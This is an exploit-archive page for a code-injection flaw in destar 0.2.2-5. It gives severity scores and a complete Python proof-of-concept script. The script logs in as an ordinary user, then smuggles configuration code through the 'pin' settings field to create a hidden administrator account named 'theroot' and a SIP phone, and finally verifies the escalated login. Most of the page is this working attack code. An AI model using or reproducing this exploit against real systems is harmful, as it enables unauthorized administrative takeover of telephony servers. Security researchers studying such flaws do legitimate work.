destar 0.2.2-5 Arbitrary Add Admin User Exploit

2009-03-30 / 2009-03-31
Credit: Enero
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# #!/usr/bin/python # # Exploit for destar 0.2.2-5, tested on Linux Debian # # Bug found and exploit coded by a non root user # http://nonroot.blogspot.com/ # # Enero 2008 # # This is a PoC, please use it just for learning how to exploit something # # use: $python ./exploit_code.py # # required: urllib, sys and re # import urllib import sys,re print "Target host: i.e: http://127.0.0.1:8080/" host=raw_input("Target host ( include http and /): ") user=raw_input("A normal user for destar:") password=raw_input("A normal password for destar:") null="" print "trying ..." loggin = urllib.urlencode({'name': user, 'pw': password}) attack = urllib.urlencode({'cfim': null, 'cfbs': null, 'cfto': null, 'dsec' : '45', 'vmim' : 'yes','vmbs' : 'yes', 'vmu' : 'yes', 'pin' : '1234,) ; CfgOptUser(name="theroot",secret="theroot",pc="200.75.43.187",phone="agent1",pbx="pbx1",level="4",language="en",) ; CfgPhoneSip(pbx="pbx1000",name="OpenBSD-Agent",secret="imsecure",ext= "2999",dtmfmode = "rfc2833",enablecallgroup = True,callgroup = "1",queues="queue1",panel= True' }) response= urllib.urlopen(host+"login/", loggin) data=response.read() lookup=re.compile("'User'").search match=lookup(data) if match: print user,"logged, now trying exploit" else: print "Password invalid, try again." sys.exit(2) response= urllib.urlopen(host+"user/settings/", attack) if response: print "ok, attack was done, now i will try loggin like 'theroot'" user='theroot' password='theroot' loggin = urllib.urlencode({'name': user, 'pw': password}) response= urllib.urlopen(host+"login/", loggin) data=response.read() lookup=re.compile("'Programmer'").search match=lookup(data) if match: print "Exploit ok. try: ",host+"/user/info" else: print "Exploit failed, sorry, maybe you need that the sysadmin restart destar, be patient!" sys.exit(2) else: print "Exploit failed, sorry, go and find some new bug or check this code and fix it!" sys.exit(2)

References:

http://www.milw0rm.com/exploits/5305


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top